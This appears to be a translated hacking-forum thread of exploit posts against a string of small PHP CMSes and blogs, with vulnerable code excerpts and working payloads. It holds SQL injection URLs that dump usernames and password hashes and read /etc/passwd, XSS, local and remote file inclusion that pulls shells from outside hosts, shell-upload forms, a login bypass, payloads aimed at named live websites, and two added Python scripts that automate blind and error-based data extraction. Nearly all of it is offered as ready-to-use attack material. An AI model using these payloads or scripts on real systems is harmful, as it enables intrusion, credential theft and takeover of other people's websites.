Nazep
Product - Nazep
Version - 0.1.4.3

SQL injection
Code:
http://localhost/index/index.php?sec=-1'/**/union/**/all/**/select/**/version()/*
Output:
Code:
<title></title>

Admin Panel
Code:
http://localhost/admon/index.php
Login:
login - 'or+1=1#
pass - 123456
Moscuito CMS (all versions) - a file-based blog engine.

PHP_SELF XSS:
Code:
http://localhost/mosquito/%3E%3Cscript%3Ealert()%3C/script%3E

Shell upload: Admin center (default password - pass) -> New (plugin) -> <?php include('http://site.com/sh.txt'); ?>
Arcadem Pro CMS [2.7]

Passive XSS:
[localhost]/index.php?cat="><script>alert();</script>

Passive XSS:
[localhost]/index.php?article="><script>alert();</script>

Active XSS: when registering, enter your code in the "Login" field and register. Your code will execute when players, statistics, etc. are viewed.

Active XSS: at [localhost]/index.php?loadpage=./includes/articleblock.php&articlecat=[number] enter your code in the comment field and submit. Your code will execute when the comments are viewed.

Blind SQL injection:
[localhost]/index.php?article=[number]+and+ascii(substring(version(),19,1))+--+Bb0y

Vulnerable code:
PHP:
$articleid = $_GET['article'];
if (is_numeric(intval($articleid)) == TRUE) {
    $sql = "SELECT * FROM AMCMS_articles WHERE articlekey=$articleid LIMIT 1;";
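The blind injection above leaks one bit per request: the page either renders the article or it does not, depending on whether ascii(substring(version(),N,1)) compared to a guess is true. The following is an added example (not code from the post or from Arcadem Pro) that automates that extraction with a binary search per character. Because it has to run offline, the vulnerable page is replaced by a constructed SQLite stand-in (make_oracle) that concatenates the parameter into `articlekey=...` exactly like the CMS code; the table name, the stored value and the unicode()/substr() template are assumptions for that stand-in, while MYSQL_TEMPLATE is the form used against a real target.

```python
import sqlite3
from typing import Callable, Tuple

# Payload templates. MYSQL_TEMPLATE is the form from the post. SQLITE_TEMPLATE
# is only for the offline stand-in below (SQLite has unicode()/substr() instead
# of ascii()/substring()).
MYSQL_TEMPLATE = "{base} and ascii(substring(({expr}),{pos},1))>{mid}"
SQLITE_TEMPLATE = "{base} and unicode(substr(({expr}),{pos},1))>{mid}"

# Constructed value standing in for version() on the target.
SECRET = "5.0.91-community"


def make_oracle() -> Callable[[str], bool]:
    """Constructed stand-in for the vulnerable page (an assumption, not the
    CMS's own code): the 'article' parameter is concatenated into the WHERE
    clause exactly like `articlekey=$articleid`, and the only feedback is
    whether a row came back. The original guard is_numeric(intval($x)) is
    always true, because intval() always returns an integer, so it blocks
    nothing."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE AMCMS_articles(articlekey INTEGER, title TEXT)")
    db.execute("INSERT INTO AMCMS_articles VALUES (1, 'first post')")
    db.execute("CREATE TABLE meta(version TEXT)")
    db.execute("INSERT INTO meta VALUES (?)", (SECRET,))

    def page(article_param: str) -> bool:
        sql = f"SELECT * FROM AMCMS_articles WHERE articlekey={article_param} LIMIT 1;"
        return db.execute(sql).fetchone() is not None

    return page


def extract(page: Callable[[str], bool], expr: str, template: str,
            base: str = "1", max_len: int = 64) -> Tuple[str, int]:
    """Recover the string value of `expr` one character at a time.

    Each character is found by binary search over the 7-bit ASCII range, so it
    costs exactly 7 requests whatever its value. Past the end of the string
    ascii(substring(...)) is 0 in MySQL (NULL in the SQLite stand-in), so every
    '>' test is false, the search converges on 0 and the loop stops.
    Returns the recovered string and the number of requests spent."""
    recovered = []
    requests = 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            requests += 1
            if page(template.format(base=base, expr=expr, pos=pos, mid=mid)):
                lo = mid + 1          # character code is above mid
            else:
                hi = mid              # character code is mid or below
        if lo == 0:
            break                     # end of string
        recovered.append(chr(lo))
    return "".join(recovered), requests


if __name__ == "__main__":
    oracle = make_oracle()
    value, n = extract(oracle, "select version from meta", SQLITE_TEMPLATE)
    print(f"recovered {value!r} in {n} requests")
    # Against a real MySQL target expr would be version(), the template
    # MYSQL_TEMPLATE, and page() an HTTP GET that checks for the article body.
```

Seven requests per character is the cost of a boolean oracle; the same loop, with page() swapped for an HTTP request and the response checked for the article's HTML, works for any scalar expression, not just version().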
Direct News (the main part is above; the post got scattered because of the message split)

RFI
Required for the RFI to work: register_globals = ON and allow_url_fopen = ON!
File: /admin/inc.php
PHP:
$from_inc = true;
header("Content-Type: text/html; charset=utf-8");
if (!file_exists($rootpath .'/config.php')) {
    header('Location: '. $adminroot .'/install/');
    die();
}
// Compatibility between PHP versions
require_once $rootpath .'/library/lib.compatibility.php';
// session management
require_once $rootpath .'/library/class.config.php';
require_once $rootpath .'/modules/panier/class.panier_article.php';
....
Target:
admin/inc.php?rootpath=http://yousite.ru/shellcode.txt?
webCocoon's simpleCMS Vuln's

webCocoon's simpleCMS
Web site : http://webcocoon.wordpress.com
Version : 0.7.0

SQL Injection
Vuln file: /content/post/show.php [str:3]
PHP:
//Show post
$get_post = mysql_query("SELECT * FROM post WHERE post_id = '$id' AND status = 'published'");
$post_result = mysql_num_rows($get_post);
$post = mysql_fetch_array($get_post);

Exploit: if magic_quotes = OFF
Code:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

id=xek' union select null,concat_ws(0x3a,username,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null from user -- &mode=post&gfile=show

* the year, month and date parameters are vulnerable as well

Local File Inclusion
Vuln file: /templates/default/template.html [str:538]
PHP:
if($mode == ""){
    include "content/front/$template.php";
} elseif($gfile == "$gfile"){
    include "content/$mode/$gfile.php";
} else {
    include "content/front/$template.php";
}

Exploit: if magic_quotes = OFF
Code:
POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

mode=../../../../../../../[local_file]%00&gfile=browse
DIY CMS bSQL inj

DIY CMS (Do It Yourself cms)
Web site : http://www.diy-cms.com
Version : 1.0

Blind SQL Injection
Vuln file: /modules/users/index.php [str:48]
PHP:
/*...*/
if(isset($diy->get['morder'])) {
    $order = $diy->get['morder'];
} else {
    $order = "userid";
}
if (isset($diy->get[msort])) {
    $sort = $diy->get[msort];
} else {
    $sort = DESC;
}
/*...*/
$result = $diy->query("SELECT * FROM diy_users WHERE userid > '0' and userid != '$diy->Guestid' and activated = 'approved' ORDER BY $order $sort LIMIT $start,$upp");
/*...*/

If the MySQL version is >= 5.0.12, the data can be read out of the Duplicate column name error.
Exploit:
Code:
http://[host]/[path]/mod.php?mod=users&morder=1+and+(select+*+from+(select+*+from+(select+name_const((select+concat_ws(0x3a,username,password)+from+diy_users+where+userid=1),1)a)b+join+(select+name_const((select+concat_ws(0x3a,username,password)+from+diy_users+where+userid=1),1)c)d)e)

* the msort parameter is vulnerable as well
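The payload above works because name_const(x, 1) produces a column whose name is the value of x; joining two derived tables that both carry that column and doing `select *` over the join makes MySQL raise error 1060, "Duplicate column name '<value>'", and the page that echoes mysql errors hands the subquery result back in the error text. The following is an added example (not code from the post or from DIY CMS) that generalises the payload to any scalar subquery and parses the leaked value out of a response. The response is a constructed sample, not captured from a real host; the hash in it is md5('admin').

```python
import re
from typing import Optional, Tuple

# MySQL error 1060 text as it appears in the echoed error.
DUP_COLUMN_RE = re.compile(r"Duplicate column name '((?:[^'\\]|\\.)*)'")


def name_const_payload(subquery: str, base: str = "1") -> str:
    """Build the error-based payload from the post for an arbitrary scalar
    subquery. The two derived tables b and d each expose one column named
    after the subquery's value; `select *` over their join is ambiguous, and
    the resulting 'Duplicate column name' error carries that value."""
    nc = f"name_const(({subquery}),1)"
    return (f"{base} and (select * from (select * from (select {nc}a)b "
            f"join (select {nc}c)d)e)")


def leak_from_error(response_body: str) -> Optional[str]:
    """Pull the leaked value out of a page that echoed the MySQL error.
    Returns None when the page shows no such error (wrong version, errors
    suppressed, or the injection point is not reached)."""
    m = DUP_COLUMN_RE.search(response_body)
    return m.group(1) if m else None


def split_credentials(leaked: str, sep: str = ":") -> Tuple[str, str]:
    """The post's subquery uses concat_ws(0x3a, username, password), so the
    leaked value has the shape 'user:hash'."""
    user, _, pw_hash = leaked.partition(sep)
    return user, pw_hash


# Constructed sample of what a page that echoes mysql_error() would return
# (not captured from a real host); the hash is md5('admin').
SAMPLE_RESPONSE = (
    "<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid "
    "MySQL result resource<br>\n"
    "Duplicate column name 'admin:21232f297a57a5a743894a0e4a801fc3'\n"
)

if __name__ == "__main__":
    payload = name_const_payload(
        "select concat_ws(0x3a,username,password) from diy_users where userid=1")
    print("morder=" + payload)
    leaked = leak_from_error(SAMPLE_RESPONSE)
    print("leaked:", split_credentials(leaked) if leaked else None)
```

The version note in the post matters: name_const() only exists from 5.0.12, and later 5.0/5.1 builds refuse a non-constant first argument ("Incorrect arguments to NAME_CONST"), in which case leak_from_error() returns None and a boolean or time-based technique has to be used instead.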
An anti-hack system was intended there :)
admin/aclass/admin_func.php
Code:
...
function format_data($r)
{
    return mysql_escape_string(stripslashes(trim($r)));
}
...
$user_name = $diy->format_data($diy->post['user_name']);
$user_pass = $diy->format_data(md5($diy->post['user_pass']));
$result = $diy->query("SELECT userid,username,password,groupid
                       FROM diy_users
                       WHERE (username ='$user_name')
                       AND (password ='$user_pass')
                       AND (groupid = 1)");
if (@$diy->dbnumrows($result) > 0) {
...
, but POST > $user_name='=0)or('

Uploader
admin/aclass/template.php
Code:
...
else if ($action=="uploadtemp")
{
    $upload = $diy->files["name_file"];
    $theme = str_replace(' ','_',$diy->post[theme]);
    $tmp_name = $upload["tmp_name"];

    if (is_uploaded_file($upload['tmp_name']))
    {
        $path = $diy->upload_path."/".$upload['name'];
        if(move_uploaded_file($tmp_name, $path))
        {
...
diy-cms.com/500.php?yaneshell=1
Product: bloofoxCMS
Author: http://www.bloofox.com/
Version: 0.3.5

LFI
Need: register_globals = ON
File: update/index.php
PHP:
$update_files[0] = "update_0.3.0-0.3.1.php";
$update_files[1] = "update_0.3.1-0.3.2.php";
$update_files[2] = "update_0.3.2-0.3.3.php";
$update_files[3] = "update_0.3.3-0.3.4.php";
$update_files[4] = "update_0.3.4-0.3.5.php";
....
if(isset($_GET['page']) && CheckInteger($_GET['page'])) {
    $page = $_GET['page'];
    $upd_var['update_file'] = SYS_WORK_DIR."/".$update_files[$page];
    if(file_exists($upd_var['update_file'])) {
        include_once($upd_var['update_file']);
    }
}
Target:
The include is fairly interesting; we trick the script. The variable looks like it is checked with intval, and the file for existence, but the variable that is actually included is not checked. We create a nonexistent array element and set its value ourselves:
?update_files[11]=../{LF}&page=11

Blind-SQL
File: plugins/text_news/text_news.php
PHP:
if($login_required == 0 && $sys_explorer_vars['link_plugin'] == 31) {
    // init db connection
    $db2 = new DB_Tpl();
    // create page handling
    $sys_vars = $cont->create_pages($db2,$_GET['start'],$sys_vars);
    // set template block
    $tpl->set_block("template_content", "content", "content_handle");
    // get sys_contents
    $db2->query("SELECT * FROM ".$tbl_prefix."sys_content WHERE explorer_id = '".$cont->eid."' AND blocked = '0' ORDER BY sorting LIMIT ".$sys_vars['start'].",".$cont->limit."");
    $no_of_records = $db2->num_rows();
Target:
?login_required=0&sys_explorer_vars['link_plugin']=31&tbl_prefix=bfCMS_sys_user+where+id=1/*
blah blah, this table has 13 columns.
In addition to #249

Blind-SQL
File: validate.php
PHP:
$username = $_GET["username"];
$password = $_GET["password"];
if(!isset($_COOKIE["deeemm"])) {
    //no cookie so reset cookie just in case
    setcookie ("deeemm", "", time() - 3600);
} elseif (isset($_COOKIE["deeemm"])) {
    //get data from cookie
    $user = explode(" ",$_COOKIE["deeemm"]);
    //compare data against database
    $sql_query = "SELECT * FROM `" . $db_table_prefix . "users` WHERE `user_name` = '$user[0]'";
    $result = mysql_db_query($db_name, $sql_query);
Target:
Set yourself a cookie deeemm with the value: "'+union+select+1,2,3,4,5,6,7,8,9,10+--+ pew-pew"

Upload Shell
Need: register_globals = ON
File: includes/upload_file.php
PHP:
if (isset($_FILES['file_data'])) {
    if ($filename) {
        $destination_file = $default_path . $media_dir . $filename;
        echo strtolower(basename($_FILES['file_data']['name']));
    }
    if (file_exists($destination_file)) {
        $count = 1;
        while (file_exists($destination_file)) {
            $filename = $count . '_' . $filename;
            $destination_file = $default_path . $media_dir . $filename;
            $count++;
        }
    }
    if ($filename && !file_exists($destination_file)) {
        if (!move_uploaded_file($_FILES['file_data']['tmp_name'], $destination_file)) {
            echo '<br>' . "Upload failed!" . '<br>';
            echo $destination_file . '<br>';
            echo ($_FILES['file_data']['name']) . '<br>';
            echo ($_FILES['file_data']['tmp_name']) . '<br>';
            echo ($_FILES['file_data']['size']) . '<br>';
            echo ($_FILES['file_data']['type']) . '<br>';
            echo ($_FILES['file_data']['error']) . '<br>';
            //print_r ($_FILES);
            exit;
        }
    }
}
Target:
Wrote a Super-Exploit.
Code:
<form action="http://HOST.com/upload_file.php" method="post" enctype="multipart/form-data">
Shell file: <input type="file" name="file_data"><br>
Path: <input type="text" name="default_path"><br>
Shell name: <input type="text" name="filename"><br>
<input type="submit" value="Xek!"><br>
</form>
Enter, for example:
Path: ./
Shell name: shell.php
Xek!
The shell will end up in the same folder as upload_file.php.
Qikblogger (qb-krypton-0.9beta-patched)
http://qikblogger.sourceforge.net

Blind SQL, mq=off
tag.php
PHP:
if ( isset($_GET['blog_name']) && isset($_GET['tagname']) ) {
    $blog_name = trim($_GET['blog_name']);
    $tagname = trim($_GET['tagname']);
    ...
    $post_ids = $b->get_tag_posts($tagname);

blogs.php
PHP:
function get_tag_posts($tagname) {
    if ( $db->query("SELECT tags.post_id as ids FROM tags, posts WHERE tags.tagname='$tagname' AND tags.blog_name='$this->blog_name' AND tags.post_id=posts.post_id AND posts.disp_dt < CURRENT_TIMESTAMP() ORDER BY posts.disp_dt DESC ;") ) {

http://localhost/qb/tag.php?blog_name=barbie&tagname=barbie'+union+select+1+--+1
Product: LimnyCMS
Author: http://www.limny.org/
Version: 1.0.1

LFI
Following today's tradition, this one is non-standard and a little interesting.
File: ajax.php
PHP:
if(substr($_POST['page'], 0, 3) != "sub") {
    define("LANGUAGE", Language());
} else {
    define("USER", @$_POST['user']);
    define("LANGUAGE", UserLanguage(USER));
}
// SESSION
if($_POST['page'] == "contact" or $_POST['page'] == "scontact" or $_POST['page'] == "subscontact" or $_POST['page']=="registernow") {
    session_start();
}
// CAN NOT MODIFY HEADERS
if(@$_GET['page'] != "size") {
    require("languages/".LANGUAGE.".php");

Note how the constants are set, and the UserLanguage(USER) function:
PHP:
function UserLanguage($username) {
    if(isset($_COOKIE['ulanguage'])) {
        return $_COOKIE['ulanguage'];
    } else {
        return UserSettings($username, "language");
    }
}

Thus:
Target:
Code:
POST /target/ajax.php?page=pewpew HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6
Cookie: ulanguage=../../{LOCAL_FILE}%00;
Connection: keep-alive

page=sub&user=lolita

Voilà.

Blind-SQL
File: cookie.php
PHP:
switch($_POST['cookie']) {
    case("login");
        $user=@$_POST['user'];
        $pass=md5(@$_POST['pass']);
        $login_result=$db->query("SELECT user, pass, ban FROM ".TABLE_PREFIX."users WHERE user='$user' AND pass='$pass'");
        if($login_row=$db->fetch_array($login_result)){
            if($login_row['ban']=="1"){echo "Ban!";exit;}
            setcookie("username", $login_row['user'], time()+86400, '/', '', 0);
            setcookie("password", $login_row['pass'], time()+86400, '/', '', 0);

You can check through the cookies: if they got reset - fail.
Target:
{POST} ?user=lolita'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,141,516,17,18,19,20,21+--+
Addition to m0Hze's post

Local File Inclusion
Vuln file: aajax.php [str:11]
PHP:
require("config.php");
require("includes/functions.php");
require("includes/class_mysql.php");
$db = new dbEngine;
$db->connect(HOSTNAME, USERNAME, PASSWORD);
$db->select(DATABASE);
define("LANGUAGE", Language());
require("languages/".LANGUAGE.".php");
/*...*/

Look at the Language() function (includes/functions.php):
PHP:
/*...*/
function Language() {
    if(CheckLogin($_COOKIE['username'], $_COOKIE['password']) == true) {
        $language = UserOption($_COOKIE['username'], "lang");
        if(isset($_COOKIE['language']) and $_COOKIE['language'] != $language) {
            /*...*/
        }
        return $language;
    } else {
        if(isset($_COOKIE['language'])) {
            $language = $_COOKIE['language'];
        } else {
            $language = Settings("language");
        }
    }
    return $language;
}
/*...*/

Exploit: if magic_quotes = OFF
Code:
GET http://[host]/[path]/aajax.php HTTP/1.0
Cookie: language=../../../../../../../[local_file]%00

* the following files are vulnerable as well: ajax.php, majax.php, print.php, uajax.php

SQL Injection
Vuln file: ajax.php [str:397]
PHP:
/*...*/
$order=@$_POST['order'];
$newsgroup=@$_POST['newsgroup'];
$number=round(@$_POST['number']);
$username=@$_POST['user'];
if(!is_numeric($number) OR $number<=0){echo "<div class=\"error\">".$lang['error1']."</div>";exit;}
if($newsgroup=="all"){$ng="";}else{$ng=" newsgroup='$newsgroup' AND";}
if($order!="date"){
    $lastnews_result=$db->query("SELECT id, title, pretext, datetime FROM ".TABLE_PREFIX."usernews WHERE user='$username' AND lang='".LANGUAGE."' AND$ng releasestatus='1' ORDER BY datetime DESC LIMIT $number");
}else{
/*...*/

Exploit: if magic_quotes = OFF
Code:
POST http://[host]/[path]/ajax.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 175
Cookie: language=en
Connection: Close
Pragma: no-cache

newsgroup=xek' union select null,concat_ws(0x3a,user,pass),null,null from lmn_users -- &page=newslist&number=1

-------------------------------------
Limny 1.01 (Auth Bypass) SQL Injection Vulnerability
GEOBLOG 1.0 STABLE
http://sourceforge.net/projects/bitdamaged/

SQL
The scripts in the blog root contain the lines:
PHP:
if(!is_numeric($id)) {
    print("Dont Be A h4x0r!!!");
    exit();

The scripts in the admin panel check:
PHP:
if($_SESSION['login'] != "user_valid_and_logged_in") {
    header("Location: ../index.php");
} //End IF

admin/listcomment.php has no such checks, so
PHP:
$query[747] = mysql_query("SELECT * FROM geo_comment WHERE linkid='$id'");
is vulnerable with magic_quotes_gpc = Off, register_globals = On:
http://localhost/geoBlog/admin/listcomment.php?id=2'+union+select+1,2,3,4,5,version(),7,8+--+1
Product: SkyBlueCanvas
Author: www.skybluecanvas.com
Version: 1.1

Upload-ShellCode
File: /wym/image.upload.php
PHP:
if (isset($_FILES['upload']) && !empty($_FILES['upload']['name'])) {
    $file = $_FILES['upload'];
    $dest = $_POST['upload_dir'];
    $ini = FileSystem::read_config( "../" . SB_MANAGERS_DIR . "media/config.php" );
    $types = array();
    if (isset($ini['mimes'])) {
        $types = $ini['mimes'];
    }
    $targets = FileSystem::list_dirs(SB_MEDIA_DIR);
    array_push($targets, SB_DOWNLOADS_DIR);
    array_push($targets, SB_UPLOADS_DIR);
    array_push($targets, ACTIVE_SKIN_DIR . "images/");
    list($exitCode, $newfile) = $Core->UploadFile($file, $dest, $types, 5000000, $targets);
    if ($exitCode == 1) {
        $success = true;
        $message = '<div class="msg-success-small"><h2>Success!</h2></div>';
    } else {
        $message = '<div class="msg-error-small"><h2>An unknown error occurred</h2></div>';
    }
}

What interests us:
list($exitCode, $newfile) = $Core->UploadFile($file, $dest, $types, 5000000, $targets);

File: /include/core.php
PHP:
function UploadFile($file, $dest, $allowtypes, $maxsize=5000000, $targets=array()) {
    $Uploader = new Uploader($allowtypes, $targets);
    return $Uploader->upload($file, $dest);
}

$Uploader->upload($file, $dest);
File: /include/uploader.php
PHP:
function upload($file, $dest) {
    if ($dest{strlen($dest)-1} != '/') $dest .= '/';
    $fname = $file['name'];
    $ftype = trim($file['type']);
    $fsize = $file['size'];
    $newfile = null;
    if ($fsize > $this->max_size) {
        $exitCode = 7;
    } else if ($fsize > $this->free_space) {
        $exitCode = 8;
    } else if (!in_array($ftype, $this->types)) {
        $exitCode = 4;
    } else if (!in_array($dest, $this->targets)) {
        $exitCode = 4;
    } else {
        $newfile = $dest.$fname;
        $max = 100;
        $ticker = 0;
        while (file_exists($newfile) && $ticker < $max) {
            $ticker++;
            $bits = explode('.', $fname);
            $ext = $bits[count($bits)-1];
            $base = implode('.', array_slice($bits, 0, -1));
            $newfile = $dest."$base.$ticker.$ext";
        }
        if (is_uploaded_file($file['tmp_name'])) {
            $exitCode = move_uploaded_file($file['tmp_name'], $newfile);
        } else {
            $exitCode = 0;
        }
    }
    return array($exitCode, $newfile);
}

So we've got to the point.
Target:
Because the target file (image.upload.php) is simply opened in the browser, the allowed upload extensions never get set. So we just send the file and the POST request:
upload_dir=../../
The number of ../ steps up the filesystem can be as many as you like; it all depends on the server configuration and where the CMS itself sits. As a result we get a shell named:
Sent: shell.php
Got: shell..php
Update: #244
The core version was updated. Target version - 1.1. As usual, with the update the developers only added holes.

SQL-inj
File: downloads.php
PHP:
if(isset($_GET['cat'])){
    $result = mysql_query("SELECT * FROM xcms_downloads WHERE category=".$_GET['cat']." ORDER By id DESC") or die(mysql_error());
    $content .=" <div class='post' id='post-8'> ";
    while($downloads = mysql_fetch_array( $result )) {
        $content .=" <table width='100%' cellpadding='0' cellspacing='1' class='tbl-border'>
        <tr>
        <td colspan='3' class='tbl2'><strong><a href='".DOWNLOADS.$downloads['file']."'>".$downloads['name']."</a></strong> </td>
        <tr>
        <td colspan='3' class='tbl1'>".$downloads['description']."</td>
        </tr>
        <tr>
        <td width='30%' class='tbl2'><strong>Added:</strong> ".$downloads['uploaded']."</td>
        <td width='30%' class='tbl1'><strong>Uploaded by:</strong><b><a href='".BASEDIR."profile.php?view=".$downloads['uploader']."'> ".$downloads['uploader']."</b></a></td>
        <td width='40%' class='tbl2'><b><a href='".$_SERVER['PHP_SELF']."?download=".$downloads['id']."'>Download (".$downloads['downloaded'].")</a></b></td>
        </tr>
        </table><br> ";
    }
Target:
Developer's site: http://sphere.xlentprojects.se/downloads.php?cat=1+union+select+1,id,3,4,username,password,7,8,9+from+xcms_members+--+
Log in - we are administrators. We won't touch anything; we're not hackers, after all.
Let's overlook the fact that 70% of all files are vulnerable. Output in column 1 works best, so we'll stop there.

No need to post the login and password.
Update! Post: #127

RFI
Need: register_globals = ON, allow_url_include = ON
File: /BLOX/scripts/editPageParams.php
There used to be an SQLi here; now there is an RFI.
PHP:
if (!$GLOBALS['user']['userIsAdmin']) return;
QS($K, $B, $terms);
function QS($K, $B, $terms) {
    require_once $GLOBALS['bloxDir'] . "/functions/getPageParams.php";
    if (empty($_SESSION['page'])) $pageId = $_GET['page'];
    else $pageId = $_SESSION['page'];
    $pageParams = WA($pageId);
    require_once $GLOBALS['bloxDir'] . "/functions/Proposition.php";
    $H = new S('pageIsHidden', $pageId);
    $pageParams['pageIsHidden'] = $H->O();
    $H = new S('parentPageIsAdopted', $pageId);
    if ($H->O()) {
        $pageParams['parentPageIsAdopted'] = true;
        $_SESSION['parentPageIsAdopted'] = true;
    }
    $B->C('pageParams', $pageParams);
    include $GLOBALS['bloxDir'] . "/includes/submitButtons.php";
    include $GLOBALS['bloxDir'] . "/includes/display.php";
}
?>
Target:
?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php?

File: /BLOX/script/chek.php
PHP:
if (!$GLOBALS['user']['userIsAdmin']) return;
LW($K, $B, $terms);
function LW($K, $B, $terms) {
    require_once $GLOBALS['bloxDir'] . "/functions/getBlockParams.php";
    ...
Target:
?user[userIsAdmin]=1&bloxDir=http://yousite.com/wso2.php?
Product: CMS-DIYAN
A CMS without MySQL
Download: http://cms-diyan.ru/index.php?file=download
OS: WIN

LFI:
Links:
http://dyian/index.php?file=\..\user\1.txt
http://dyian/index.php?file=\..\user\1.txt&news
PHP:
include_once('php/function.php');
if (!isset($_GET["file"])){
    $ret=vizov_file("index");
}
if (isset($_GET["file"])){
    $file=$_GET["file"];
    if (!ereg('^[^./][^/]*$', $file)) die("hack protection triggered!");
    $ret=vizov_file($file);
}
PHP:
function vizov_file($file) {
    $filedir="files/".$file;
    if (isset($_GET['news']))$filedir="news/".$file;
    if (file_exists($filedir)){
        if ((isset($_GET["dlyadruzey"]))&&(@fopen("http://cms-diyan.ru/dlyadruzey/".$_GET["dlyadruzey"], "r")))$filedir="http://cms-diyan.ru/dlyadruzey/".$_GET["dlyadruzey"];
        if (!file_exists($filedir))die('File not found '.$filedir);
        $handle = fopen($filedir, "r");
        $ret[4] = '';
        $i=0;
        while (!feof($handle)) {
            $buffer = fgets($handle, 4096);
            if($i==0) $ret[0]=$buffer;
            elseif($i==1) $ret[1]=$buffer;
            elseif($i==2) $ret[2]=$buffer;
            elseif($i==3) $ret[3]=$buffer;
            else $ret[4].=$buffer;
            $i++;
        }
        fclose($handle);
Magazin IT online (Design & Development by Twenty Advertising)
http://www.accessdatamedia.ro

SQL
stiri.php
PHP:
if(isset($_GET['id']) && ($_GET['id']!="")) {
    $where=' WHERE `news`.`id_news`='.$_GET['id'];
}
mysql_select_db($database_conn, $conn);
$query_news = "SELECT * FROM news ".$where;

http://www.accessdatamedia.ro/stiri.php?id=-100+union+all+select+1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4+from+mysql.user+--+

certificare.php
PHP:
$query_news = "SELECT * FROM `certifications` where id_certification=".stripslashes($_GET['id']);

http://www.accessdatamedia.ro/certificare.php?id=-3+union+select+1,2,load_file(0x2f6574632f706173737764),4+--+
BlognPlus
http://www.blogn.org/

SQL
index.php
PHP:
case "e":
    $blogn_entry_id = @$_GET["e"];
    $blogn_skin = preg_replace("/\{SEARCH\}[\w\W]+?\{\/SEARCH\}/", "", $blogn_skin);
    $blogn_skin = preg_replace("/\{PROFILES\}[\w\W]+?\{\/PROFILES\}/", "", $blogn_skin);
    $blogn_skin = preg_replace("/\{COMMENTLIST\}[\w\W]+?\{\/COMMENTLIST\}/", "", $blogn_skin);
    $blogn_skin = preg_replace("/\{COMMENTNEW\}[\w\W]+?\{\/COMMENTNEW\}/", "", $blogn_skin);
    $blogn_skin = preg_replace("/\{TRACKBACKLIST\}[\w\W]+?\{\/TRACKBACKLIST\}/", "", $blogn_skin);
    $blogn_skin = preg_replace("/\{TRACKBACKNEW\}[\w\W]+?\{\/TRACKBACKNEW\}/", "", $blogn_skin);
    $blogn_skin = blogn_entry_view($blogn_user, $blogn_skin, $blogn_entry_id);

nikkiFuntions.php
PHP:
function blogn_entry_view($user, $skin, $entry_id) {
    $skin = preg_replace("/\{LOG\}/", "", $skin);
    $skin = preg_replace("/\{LOG[ ]+([\w\W]+?)\}/", "", $skin);
    $skin = preg_replace("/\{\/LOG\}/", "", $skin);
    $nextbackurl = blogn_mod_db_log_nextback_url($user, $entry_id);

db_mysql.php
PHP:
function blogn_mod_db_log_nextback_url($user, $key_id) {
    $sql_connect = @mysql_connect(BLOGN_DB_HOST.":".BLOGN_DB_PORT, BLOGN_DB_USER, BLOGN_DB_PASS);
    mysql_select_db(BLOGN_DB_NAME);
    $qry = "SELECT date FROM ".BLOGN_DB_PREFIX."_loglist WHERE id = ".$key_id;

http://hangulnikki.hanguk.jp/index.php?e=-100+union+select+1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd'),concat_ws(0x203a20,version(),user(),host,user,password,file_priv),13+from+mysql.user--
Product: TinX CMS
Author: cms.tinx.dk
Version: 3.5.2
Need: magic_quotes_gpc = off, register_globals = on

Remote Code Execution
File: /admin/actions.php
PHP:
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["cmsadmin"])) {
    //echo "POST(".$_POST["cmsadmin"].")<br>";
    $defaultdocumentid = $_POST["defaultdocumentid"];
    $language = $_POST["language"];
    $appendToTitle = $_POST["appendToTitle"];
    $www = $_POST["www"];
    $theme = $_POST["theme"];
    $theme = $_POST["theme"];
    $template = $_POST["template"];
    $loginsystem = $_POST["loginsystem"];
    $companyName = $_POST["companyName"];
    $siteDesign = $_POST["siteDesign"];
    $searchresult_quickid = $_POST["searchresult_quickid"];
    $contact_quickid = $_POST["contact_quickid"];
    $sitemap_quickid = $_POST["sitemap_quickid"];
    $max_root_documents = $_POST["max_root_documents"];
    //phpinfo();
    $d = date("Y-m-d_h-i-s", time());
    exec("cp " . $system["DOCUMENT_ROOT"] . "/inc/customer_config.php " . $_SERVER["DOCUMENT_ROOT"] . "/inc/customer_config_$d.php");
    $cfile = $system["DOCUMENT_ROOT"] . "/inc/customer_config.php";
    $fh = fopen($cfile, 'w') or die("can't open file: No ACCESS TO FILE OR LIBRARY!!!!!");
    $write = <<< html
<?php
/************************************************
Settings that can be changed - TinX/cms
*************************************************/
\$appendToTitle = "$appendToTitle";
\$companyName = "$companyName";
\$language = "$language"; /* da = danish, en=english.... make some up */
\$defaultdocumentid = "$defaultdocumentid"; /* If index.php is launched, this document id is called */
\$searchresult_quickid = "$searchresult_quickid"; /* search page QuickID */
\$contact_quickid = "$contact_quickid"; /* contact page QuickID */
\$sitemap_quickid = "$sitemap_quickid"; /* sitemap page QuickID */
\$max_root_documents = "$max_root_documents"; /* Max number of root elements in menu */
\$www = "$www"; // URL of the website
\$theme["name"] = "$theme";
\$antalStatus = 2;
\$statusNames[0] = "Aktiv"; /* statusNames holds the status codes for the document - active/inactive etc. */
\$statusNames[1] = "Inaktiv";
/* Google Webmaster tools */
\$googlesitemap_path = \$www . "/googlesitemap.xml";
/* Show/hide input fields on settings.php: to hide a field, enter a default value, otherwise "" */
\$settings_options["documenttitle"] = "";
\$settings_options["category"] = "Standard";
\$settings_options["template"] = "$template";
// LOGIN TYPE
\$login_system = "$loginsystem"; //values: phpBB - TinX
// Other settings
\$siteDesign = "$siteDesign";
\$siteDesignPath = "designs/" . \$siteDesign;
\$siteTemplatePath = "designs/" . \$siteDesign ."/templates/";
\$siteContainerPath = "designs/" . \$siteDesign ."/containers/";
if (file_exists(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php")) include(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php");
